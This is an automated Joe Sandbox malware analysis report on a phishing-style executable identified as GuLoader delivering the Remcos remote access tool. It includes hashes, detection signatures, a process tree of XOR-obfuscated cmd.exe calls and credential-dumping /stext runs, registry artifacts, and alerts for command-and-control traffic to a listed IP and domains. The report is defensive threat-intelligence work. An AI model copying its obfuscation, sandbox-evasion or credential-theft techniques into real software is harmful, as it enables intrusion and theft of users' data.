Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1Quotation.scr.exe

Overview

General Information

Sample name:z1Quotation.scr.exe
Analysis ID:1522580
MD5:0a648622633dbd21fef151b525657b2c
SHA1:49a34b496d78054a1b6404dd04d9be60d071ae52
SHA256:3cc2813b0ce3a69bd64acdbe194fa68e067a150626cf45e665a27836f39ac39d
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Mass process execution to delay analysis
Obfuscated command line found
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected BrowsingHistoryView browser history reader tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

Process Tree

  • System is w10x64native
  • z1Quotation.scr.exe (PID: 2504 cmdline: "C:\Users\user\Desktop\z1Quotation.scr.exe" MD5: 0A648622633DBD21FEF151B525657B2C)
    • cmd.exe (PID: 6920 cmdline: cmd.exe /c set /a "250^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8108 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2236 cmdline: cmd.exe /c set /a "227^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7528 cmdline: cmd.exe /c set /a "255^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1824 cmdline: cmd.exe /c set /a "244^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5532 cmdline: cmd.exe /c set /a "253^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5688 cmdline: cmd.exe /c set /a "130^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3488 cmdline: cmd.exe /c set /a "131^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 460 cmdline: cmd.exe /c set /a "139^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6076 cmdline: cmd.exe /c set /a "242^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7528 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1824 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8092 cmdline: cmd.exe /c set /a "208^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2948 cmdline: cmd.exe /c set /a "197^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3488 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "247^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6424 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4196 cmdline: cmd.exe /c set /a "221^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1252 cmdline: cmd.exe /c set /a "212^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1188 cmdline: cmd.exe /c set /a "240^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3032 cmdline: cmd.exe /c set /a "153^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7932 cmdline: cmd.exe /c set /a "220^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7136 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7208 cmdline: cmd.exe /c set /a "195^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3492 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 32 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6060 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7852 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2260 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1508 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3572 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7208 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1896 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2820 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2440 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5252 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6648 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1124 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3064 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 712 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1000 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 836 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7468 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2808 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2704 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7208 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1896 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2820 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2440 cmdline: cmd.exe /c set /a "193^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 5828 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1500 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 3492 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4600 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6380 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2448 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 836 cmdline: cmd.exe /c set /a "133^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 6780 cmdline: cmd.exe /c set /a "157^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4692 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 4312 cmdline: cmd.exe /c set /a "216^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 2808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1392 cmdline: cmd.exe /c set /a "145^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 1048 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7996 cmdline: cmd.exe /c set /a "201^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 7136 cmdline: cmd.exe /c set /a "137^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2716 cmdline: cmd.exe /c set /a "129^177" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • z1Quotation.scr.exe (PID: 1412 cmdline: "C:\Users\user\Desktop\z1Quotation.scr.exe" MD5: 0A648622633DBD21FEF151B525657B2C)
      • dxdiag.exe (PID: 6472 cmdline: "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)
      • z1Quotation.scr.exe (PID: 1224 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 192 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 5792 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 5080 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk" MD5: 0A648622633DBD21FEF151B525657B2C)
      • WerFault.exe (PID: 7112 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 2348 MD5: 40A149513D721F096DDF50C04DA2F01F)
      • z1Quotation.scr.exe (PID: 4224 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 6900 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro" MD5: 0A648622633DBD21FEF151B525657B2C)
      • z1Quotation.scr.exe (PID: 320 cmdline: C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm" MD5: 0A648622633DBD21FEF151B525657B2C)
  • mstee.sys (PID: 4 cmdline: MD5: 244C73253E165582DDC43AF4467D23DF)
  • mskssrv.sys (PID: 4 cmdline: MD5: 26854C1F5500455757BC00365CEF9483)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000000.00000002.33493748290.0000000000637000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            140.2.z1Quotation.scr.exe.400000.0.unpackJoeSecurity_BrowsingHistoryViewYara detected BrowsingHistoryView browser history reader toolJoe Security
              140.2.z1Quotation.scr.exe.400000.0.raw.unpackJoeSecurity_BrowsingHistoryViewYara detected BrowsingHistoryView browser history reader toolJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\mstee.sys, NewProcessName: C:\Windows\System32\drivers\mstee.sys, OriginalFileName: C:\Windows\System32\drivers\mstee.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: mstee.sys

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: Registry Key setAuthor: Joe Security: Data: Details: EA DC AD 95 A2 7E A8 CB A3 82 EA 39 4A 1B C0 99 72 F1 66 AF EC DC 17 8C BB EF 22 57 AF C4 80 81 7E BE 76 0A 7E 56 33 A2 94 BD 90 D0 91 E3 BA 9F 58 20 0B 74 F4 99 8F 64 7B 3F 56 A4 D5 DD F0 CD A3 CD 33 3F 7B CB 8C E2 C7 EB 3C 9F 93 5D 6E 56 05 E2 8A 28 AF C4 4E 1C , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\z1Quotation.scr.exe, ProcessId: 1412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ZLUOGZ\exepath

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T12:05:03.461127+020020365941Malware Command and Control Activity Detected192.168.11.204976123.106.238.2092404TCP
                2024-09-30T12:08:17.762243+020020365941Malware Command and Control Activity Detected192.168.11.204976323.106.238.2092404TCP
                2024-09-30T12:08:18.090313+020020365941Malware Command and Control Activity Detected192.168.11.204976423.106.238.2092404TCP
                2024-09-30T12:08:43.100498+020020365941Malware Command and Control Activity Detected192.168.11.204976723.106.238.2092404TCP
                2024-09-30T12:08:50.927192+020020365941Malware Command and Control Activity Detected192.168.11.204976823.106.238.2092404TCP
                2024-09-30T12:08:51.489322+020020365941Malware Command and Control Activity Detected192.168.11.204976923.106.238.2092404TCP
                2024-09-30T12:09:07.407551+020020365941Malware Command and Control Activity Detected192.168.11.204977023.106.238.2092404TCP
                2024-09-30T12:09:24.560134+020020365941Malware Command and Control Activity Detected192.168.11.204977123.106.238.2092404TCP
                2024-09-30T12:09:51.882170+020020365941Malware Command and Control Activity Detected192.168.11.204977423.106.238.2092404TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T12:05:05.296120+020028033043Unknown Traffic192.168.11.2049762178.237.33.5080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-30T12:05:00.321579+020028032702Potentially Bad Traffic192.168.11.2049760102.65.21.26443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for domain / URL
                Source: telesavers.co.zaVirustotal: Detection: 13%Perma Link
                Source: http://geoplugin.net/json.gpVirustotal: Detection: 6%Perma Link
                Multi AV Scanner detection for submitted file
